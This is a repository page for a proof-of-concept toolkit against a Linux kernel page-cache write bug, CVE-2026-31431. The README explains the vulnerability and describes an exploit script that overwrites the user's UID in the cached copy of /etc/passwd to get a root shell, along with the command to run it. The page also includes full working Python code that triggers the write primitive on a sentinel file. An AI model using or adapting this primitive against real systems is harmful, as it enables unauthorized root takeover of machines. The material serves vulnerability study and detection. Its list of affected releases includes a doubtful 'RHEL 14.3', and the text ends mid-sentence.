rootsecdev/cve_2026_31431 (Python)

Exploit POC for CVE_2026_31431

From the README

CVE-2026-31431 ("Copy Fail") Toolkit

Detector and proof-of-concept LPE for the Linux algif_aead / authencesn page-cache scratch-write bug disclosed 2026-04-29.

Disclosure writeup:

Authorization

Use only on hosts you own or are explicitly engaged to assess. The LPE modifies only in-memory state (the page cache), never the on-disk files, but the technique is real privilege escalation; running it on systems without authorization is illegal in most jurisdictions.

Vulnerability summary

algif_aead runs AEAD operations in-place (req->src == req->dst). When the source data is fed in via splice() from a regular file, the destination scatterlist contains references to the file's page-cache pages — i.e. the kernel will write into them. The authencesn(hmac(sha256), cbc(aes)) algorithm then performs a 4-byte "scratch" write of the AAD's seqno_lo field (bytes 4–7 of the sendmsg-supplied AAD) into that destination, corrupting the page-cache copy of the file.

Because the on-disk file is never modified, there is no on-disk signature: the corruption lives only in the page cache, is seen by every reader that shares it, and disappears once the page is evicted. /etc/passwd and /usr/bin/su are both world-readable, so an unprivileged local user can corrupt the running kernel's view of either.

Affected: kernels carrying commit 72548b093ee3 (in-place AEAD, 2017) without the upstream revert. The disclosure confirmed Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 14.3, and SUSE 16, but the underlying primitive dates from that 2017 commit, so older kernels that carry it and lack the revert are affected as well.

Files

| File | Purpose |
| --- | --- |
| test_cve_2026_31431.py | Non-destructive detector. Operates on a sentinel file in a temp dir; never touches system binaries. |
| exploit_cve_2026_31431.py | LPE. Flips the running user's UID to 0 in /etc/passwd's page cache, then invokes su for a root shell. |

Both scripts are pure Python 3.10+ stdlib.

Quick start

# 1. Detect
python3 test_cve_2026_31431.py
#   exit 0 = not vulnerable, 2 = vulnerable, 1 = test error

# 2. Exploit (interactive — su will prompt for your own password)
python3 exploit_cve_2026_31431.py --shell

Detector usage

python3 test_cve_2026_31431.py

What it does:

  1. Confirms AF_ALG and the authencesn(hmac(sha256),cbc(aes)) algorithm are reachable from an unprivileged process.
  2. Creates a 4 KiB sentinel file in a temp directory, populates the page cache.
  3. Sends 8 bytes of AAD inline via sendmsg+cmsg with seqno_lo set to the marker PWND, then os.splice()s 32 bytes of the sentinel's page-cache page into the AF_ALG op socket (through a pipe, since splice(2) requires a pipe on one side), so the op's destination scatterlist references the file's page-cache page rather than a copy.
  4. Calls recv() to drive decryption. The scratch write happens before the tag is verified, so it fires regardless; the HMAC check then fails and recv() raises EBADMSG.
  5. Re-reads the file (page cache, not disk) and looks for the marker.
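The five steps above, and the primitive described under "Vulnerability summary", as an added example. This is not the project's test_cve_2026_31431.py; it is a stand-alone stdlib-only detector written for this page. Assumptions of my own: the ALG_SET_KEY blob layout for authenc-family algorithms (rtattr header, big-endian enckeylen, HMAC key, AES key), the file-to-pipe-to-socket splice route, a 16-byte tag, dummy keys, a constructed marker-free sentinel pattern, and the exit code used for the "MODIFIED" class, which the README does not state. It only ever writes to a sentinel file in a fresh temp dir.

```python
"""Added example detector for the Copy Fail primitive (not the project's own code)."""
import os
import socket
import struct
import tempfile

ALGO = "authencesn(hmac(sha256),cbc(aes))"
MARKER = b"PWND"          # lands in the spliced page on a vulnerable kernel
PAGE = 4096
TAGLEN = 16               # assumed tag length; any value >= 4 is accepted by authencesn

# README exit codes: 0 = not vulnerable, 1 = test error, 2 = vulnerable.
# "MODIFIED" is assigned 2 here as an assumption (the page does not give its code).
EXIT_CODES = {"NOT VULNERABLE": 0, "PRECONDITION NOT MET": 0, "TEST ERROR": 1,
              "VULNERABLE": 2, "MODIFIED": 2}


def build_aad(marker: bytes) -> bytes:
    """8-byte AAD: bytes 0-3 a dummy SPI, bytes 4-7 the seqno_lo field the scratch write copies."""
    if len(marker) != 4:
        raise ValueError("marker must be exactly 4 bytes")
    return b"\x00\x00\x00\x01" + marker


def authenc_key(hmac_key: bytes, aes_key: bytes) -> bytes:
    """Assumed ALG_SET_KEY layout for authenc(...)/authencesn(...):
    struct rtattr {u16 rta_len=8; u16 rta_type=CRYPTO_AUTHENC_KEYA_PARAM(1)},
    then be32 enckeylen, then the MAC key and the cipher key."""
    return struct.pack("=HH", 8, 1) + struct.pack(">I", len(aes_key)) + hmac_key + aes_key


def classify(original: bytes, observed: bytes, marker: bytes = MARKER) -> str:
    """Map the re-read page-cache contents onto the README's output classes."""
    if marker in observed:
        return "VULNERABLE"
    if observed != original:
        return "MODIFIED"
    return "NOT VULNERABLE"


def detect(marker: bytes = MARKER, timeout: float = 5.0) -> tuple[str, int]:
    """Run steps 1-5 against a sentinel file; returns (label, exit_code)."""
    if not hasattr(socket, "AF_ALG") or not hasattr(os, "splice"):
        return "PRECONDITION NOT MET", EXIT_CODES["PRECONDITION NOT MET"]
    try:
        tfm = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError:
        return "PRECONDITION NOT MET", EXIT_CODES["PRECONDITION NOT MET"]
    with tfm:
        try:
            tfm.bind(("aead", ALGO))                       # step 1: algorithm reachable?
        except OSError:
            return "PRECONDITION NOT MET", EXIT_CODES["PRECONDITION NOT MET"]
        # Constructed, marker-free sentinel pattern filling one page.
        original = bytes(range(256)) * (PAGE // 256)
        assert marker not in original
        with tempfile.TemporaryDirectory() as tmp:
            fd = os.open(os.path.join(tmp, "sentinel"), os.O_RDWR | os.O_CREAT, 0o600)
            try:
                tfm.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY,
                               authenc_key(b"h" * 32, b"k" * 16))       # dummy keys
                tfm.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, TAGLEN)
                os.write(fd, original)                     # step 2: populate the page cache
                op, _ = tfm.accept()
                with op:
                    op.settimeout(timeout)
                    # step 3: AAD inline (cmsg carries op/iv/assoclen), request kept open
                    op.sendmsg_afalg([build_aad(marker)], op=socket.ALG_OP_DECRYPT,
                                     iv=bytes(16), assoclen=8, flags=socket.MSG_MORE)
                    # 32 bytes (16 CT + 16 tag) spliced file -> pipe -> op socket so the
                    # kernel references the page-cache page instead of copying it
                    r, w = os.pipe()
                    try:
                        n = os.splice(fd, w, 32, offset_src=0)
                        moved = 0
                        while moved < n:
                            moved += os.splice(r, op.fileno(), n - moved)
                    finally:
                        os.close(r)
                        os.close(w)
                    # step 4: drive decryption; EBADMSG (tag mismatch) is the expected outcome
                    # and the file contents, not the errno, decide the verdict
                    try:
                        op.recv(64)
                    except OSError:
                        pass
                observed = os.pread(fd, PAGE, 0)           # step 5: re-read via page cache
            except OSError:
                return "TEST ERROR", EXIT_CODES["TEST ERROR"]
            finally:
                os.close(fd)
    label = classify(original, observed, marker)
    return label, EXIT_CODES[label]


if __name__ == "__main__":
    verdict, code = detect()
    print(verdict)
    raise SystemExit(code)
```

The verdict is taken from the sentinel's contents rather than from the recv() errno because a kernel that rejects the splice path, or that fails the op for some other reason, still leaves the page untouched, and that is what "not vulnerable" means here.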

Output classes:

  • Precondition not met: AF_ALG or authencesn unavailable. Exit 0.
  • VULNERABLE to CVE-2026-31431: marker PWND landed in the spliced page. Exit 2.
  • Page cache MODIFIED via in-place AEAD splice path: the page was written to but the marker did